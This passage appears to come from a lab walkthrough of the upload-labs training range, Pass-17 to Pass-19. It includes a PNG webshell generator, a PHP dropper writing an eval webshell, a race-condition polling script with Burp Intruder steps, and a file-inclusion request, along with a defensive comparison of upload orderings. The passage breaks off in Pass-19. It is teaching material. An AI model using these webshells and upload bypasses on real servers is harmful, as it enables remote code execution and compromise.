class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"jpg"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/jpeg"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">// generate a new image from the uploaded one</span></span><br><span class="line"> <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefromjpeg</span>(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是jpg格式的图片!"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">// assign a file name to the new image</span></span><br><span class="line"> <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line"> <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">".jpg"</span>;</span><br><span class="line"> <span class="comment">// display the re-rendered image (the new image generated from the user's upload)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> <span class="title function_ invoke__">imagejpeg</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"> 
@<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"png"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/png"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">// generate a new image from the uploaded one</span></span><br><span class="line"> <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefrompng</span>(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是png格式的图片!"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">// assign a file name to the new image</span></span><br><span class="line"> <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line"> <span class="variable">$newfilename</span> = <span class="title function_ 
invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">".png"</span>;</span><br><span class="line"> <span class="comment">// display the re-rendered image (the new image generated from the user's upload)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> <span class="title function_ invoke__">imagepng</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>; </span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"gif"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/gif"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">// generate a new image from the uploaded one</span></span><br><span class="line"> <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefromgif</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span 
class="string">"该文件不是gif格式的图片!"</span>;</span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">// assign a file name to the new image</span></span><br><span class="line"> <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line"> <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">".gif"</span>;</span><br><span class="line"> <span class="comment">// display the re-rendered image (the new image generated from the user's upload)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> <span class="title function_ invoke__">imagegif</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传后缀为.jpg|.png|.gif的图片文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The <code>imagecreatefrom...</code> functions re-render the image file. They belong to the PHP GD library (GD is PHP's image-processing extension).<br>If an image webshell is uploaded, the one-line payload inside it is wiped by the re-rendering, so the task is to craft an image webshell whose payload is still present afterwards. For the defender this also means re-rendering is only a partial control: a crafted file can survive it, so the upload directory must still be neither includable nor executable.</p>
<p>The following code produces a PNG image webshell whose malicious code survives re-rendering</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="comment">//png.php</span></span><br><span class="line"> <span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0xe</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>, <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>, <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>, <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span 
class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>, <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"> <span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ 
invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./pass17.png'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Usage:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">php payload.php file.png</span><br></pre></td></tr></table></figure>
<p>file.png is an ordinary PNG image~<br>pass17.png is produced at the end. (Note that the script as shown does not read the file.png argument: it draws the 32x32 image itself and writes it to <code>./pass17.png</code>.)</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726105438294.png" alt="image-20200726105438294"></p>
<p>Upload pass17<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582860869-929498-upload-labs17-2.png" alt="img"></p>
<p>Pass the POST parameter through the file inclusion vulnerability:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Load URL</span><br><span class="line">http://192.168.20.134/include.php?file=upload/pass17.png&0=phpinfo</span><br><span class="line"></span><br><span class="line">Post data</span><br><span class="line">1=-1</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582860893-792902-upload-labs17-3.png" alt="img"></p>
<blockquote>
<h1 id="Max-HackBar拓展"><a href="#Max-HackBar拓展" class="headerlink" title="Max HackBar拓展"></a>Max HackBar extension</h1><p><a href="https://addons.mozilla.org/zh-CN/firefox/addon/max-hackbar/">https://addons.mozilla.org/zh-CN/firefox/addon/max-hackbar/</a></p>
</blockquote>
<h2 id="Pass-18-条件竞争"><a href="#Pass-18-条件竞争" class="headerlink" title="Pass-18-条件竞争"></a>Pass-18-Race condition</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$file_name</span>,<span class="title function_ invoke__">strrpos</span>(<span class="variable">$file_name</span>,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="variable">$upload_file</span> = UPLOAD_PATH . <span class="string">'/'</span> . 
<span class="variable">$file_name</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$upload_file</span>)){</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span>. <span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="title function_ invoke__">rename</span>(<span class="variable">$upload_file</span>, <span class="variable">$img_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> <span class="title function_ invoke__">unlink</span>(<span class="variable">$upload_file</span>);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>A textbook race-condition upload.<br>Execution order: move first, then check; if the extension is not allowed the file is deleted, if it is allowed the file is renamed.<br>So we keep firing requests with Burp, which keeps the PHP program constantly in the stage where it has just moved the php file into the upload directory</p>
<p>We request the uploaded file concurrently from several threads; sooner or later one request lands in the window between the file being moved and being deleted and reaches the uploaded PHP file. As soon as we reach it once, it writes a shell to the server</p>
<p>First, create the PHP file used for Pass-18: pass18.php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="keyword">echo</span> <span class="string">"1"</span>;<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST[cmd])?>'</span>);<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>Then write a Python script that checks whether the upload succeeded: pass18_check_upload.py</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="comment"># Lab host used in this writeup; pass18.php echoes "1" when it runs</span></span><br><span class="line">URL = <span class="string">"http://192.168.20.134:80/upload/pass18.php"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="built_in">print</span>(i, end=<span class="string">'\r'</span>)</span><br><span class="line">            a = requests.get(URL)</span><br><span class="line">            <span class="comment"># "1" in the body means this request landed while pass18.php still existed</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">"1"</span> <span class="keyword">in</span> a.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">"OK"</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">except</span> requests.RequestException:</span><br><span class="line">            <span class="comment"># connection errors are expected while the race is running; keep polling</span></span><br><span class="line">            <span class="keyword">pass</span></span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>Next, build an Intruder attack in Burp and send it<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582863890-932234-upload-labs18-2.png" alt="img"></p>
<p>Next, configure the payloads<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582863911-248365-upload-labs18-3.png" alt="img"></p>
<p>Raise the thread count</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726111444677.png" alt="image-20200726111444677"></p>
<p>Then run Burp and the Python script at the same time and wait for the race to succeed and the upload to land</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python3 pass18_check_upload.py</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726112904493.png" alt="image-20200726112904493"></p>
<p>Error: pip and the requests module need to be installed</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">brew install python</span><br><span class="line">pip3 install --upgrade pip</span><br><span class="line">pip3 --version # check the version</span><br><span class="line">pip3 list # list the installed packages</span><br><span class="line"></span><br><span class="line">pip3 install requests</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582864123-615793-upload-labs18-4.png" alt="img"></p>
<p>Then connect to the one-line webshell with AntSword or Caidao:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582864260-231062-upload-labs18-5.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582864269-973066-upload-labs18-6.png" alt="img"></p>
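<p>The move-then-check order explained at the start of Pass-18 is the whole bug. The following PHP, an added example rather than upload-labs code, runs that order and the corrected check-then-move order against a constructed upload, with a hook standing in for a concurrent request that arrives between the two steps; <code>moveThenCheck</code>, <code>checkThenMove</code> and <code>ALLOWED_EXT</code> are names invented for the example.</p>

```php
<?php
// Added example (not upload-labs code): the Pass-18 handler moves the upload
// into the web root first and validates afterwards, so for a moment a "*.php"
// file exists where the web server can execute it. Both orderings are run
// below with a hook ($between) that stands in for a parallel request.

const ALLOWED_EXT = ['jpg', 'png', 'gif'];

/** Vulnerable ordering (as in the lab): move, then check, then unlink. */
function moveThenCheck(string $tmp, string $origName, string $uploadDir, callable $between): ?string
{
    $ext  = strtolower(pathinfo($origName, PATHINFO_EXTENSION));
    $dest = $uploadDir . '/' . basename($origName);   // client-chosen, predictable name
    rename($tmp, $dest);                 // stands in for move_uploaded_file()
    $between($dest);                     // a parallel request lands here
    if (!in_array($ext, ALLOWED_EXT, true)) {
        unlink($dest);                   // too late: the file was already reachable
        return null;
    }
    return $dest;
}

/** Fixed ordering: validate the temp file, then move it under a server-chosen name. */
function checkThenMove(string $tmp, string $origName, string $uploadDir, callable $between): ?string
{
    $between($uploadDir . '/' . basename($origName));  // a parallel request finds nothing
    $ext = strtolower(pathinfo($origName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        unlink($tmp);                    // the temp file never touched the web root
        return null;
    }
    // Random name chosen by the server; extension taken from the allow-list check.
    $dest = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    rename($tmp, $dest);
    return $dest;
}

// --- demonstration ----------------------------------------------------------
$uploadDir = sys_get_temp_dir() . '/race_demo_' . getmypid();
mkdir($uploadDir);

$seen = [];
$observer = function (string $path) use (&$seen) {
    $seen[] = file_exists($path) ? 'found ' . basename($path) : 'nothing at ' . basename($path);
};

foreach (['evil.php', 'cat.jpg'] as $name) {
    foreach (['moveThenCheck', 'checkThenMove'] as $handler) {
        // Constructed upload body standing in for $_FILES[...]['tmp_name'].
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, "constructed upload body, not an image");
        $stored = $handler($tmp, $name, $uploadDir, $observer);
        printf("%-8s %-14s stored as %-22s observer saw: %s\n",
            $name, $handler, $stored === null ? '(rejected)' : basename($stored), end($seen));
        if ($stored !== null) {
            unlink($stored);
        }
    }
}
rmdir($uploadDir);
```

<p>In the vulnerable ordering the observer sees <code>evil.php</code> present in the upload directory even though the handler goes on to reject it; in the fixed ordering nothing is ever placed there until the extension has passed, and what is placed has a name the uploader cannot predict, so there is no window to race and no URL to poll.</p>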
<h2 id="Pass-19-条件竞争2"><a href="#Pass-19-条件竞争2" class="headerlink" title="Pass-19-条件竞争2"></a>Pass-19-Race condition 2</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">require_once</span>(<span class="string">"./myupload.php"</span>);</span><br><span class="line"> <span class="variable">$imgFileName</span> =<span class="title function_ invoke__">time</span>();</span><br><span class="line"> <span class="variable">$u</span> = <span class="keyword">new</span> <span class="title class_">MyUpload</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'size'</span>],<span class="variable">$imgFileName</span>);</span><br><span class="line"> <span class="variable">$status_code</span> = <span class="variable">$u</span>-><span class="title function_ invoke__">upload</span>(UPLOAD_PATH);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$status_code</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> <span class="variable">$img_path</span> 
= <span class="variable">$u</span>->cls_upload_dir . <span class="variable">$u</span>->cls_file_rename_to;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件已经被上传,但没有重命名。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">1</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'这个文件不能上传到服务器的临时文件存储目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传目录不可写。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">3</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,无法上传该类型文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">4</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传的文件过大。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">5</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,服务器已经存在相同名称文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">6</span>:</span><br><span class="line"> <span 
class="variable">$msg</span> = <span class="string">'文件无法上传,文件不能复制到目标目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'未知错误!'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//myupload.php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyUpload</span></span>{</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line"> <span class="keyword">var</span> <span class="variable">$cls_arr_ext_accepted</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">".doc"</span>, <span class="string">".xls"</span>, <span class="string">".txt"</span>, <span class="string">".pdf"</span>, <span class="string">".gif"</span>, <span class="string">".jpg"</span>, <span class="string">".zip"</span>, <span class="string">".rar"</span>, <span class="string">".7z"</span>,<span class="string">".ppt"</span>,</span><br><span class="line"> <span class="string">".html"</span>, <span class="string">".xml"</span>, <span class="string">".tiff"</span>, <span class="string">".jpeg"</span>, <span class="string">".png"</span> );</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... 
</span><br><span class="line"> <span class="comment">/** upload()</span></span><br><span class="line"><span class="comment"> **</span></span><br><span class="line"><span class="comment"> ** Method to upload the file.</span></span><br><span class="line"><span class="comment"> ** This is the only method to call outside the class.</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@para</span> String name of directory we upload to</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@returns</span> void</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"> <span class="variable">$dir</span> </span>)</span>{</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">isUploadedFile</span>();</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">setDir</span>( <span class="variable">$dir</span> );</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( 
<span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">checkExtension</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">checkSize</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if flag to check if the file exists is set to 1</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="variable language_">$this</span>->cls_file_exists == <span class="number">1</span> ){</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">checkFileExists</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span 
class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// if we are here, we are ready to move the file to destination</span></span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">move</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// check if we need to rename the file</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable language_">$this</span>->cls_rename_file == <span class="number">1</span> ){</span><br><span class="line"> <span class="variable">$ret</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">renameFile</span>();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>-><span class="title function_ invoke__">resultUpload</span>( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if we are here, everything worked as planned :)</span></span><br><span 
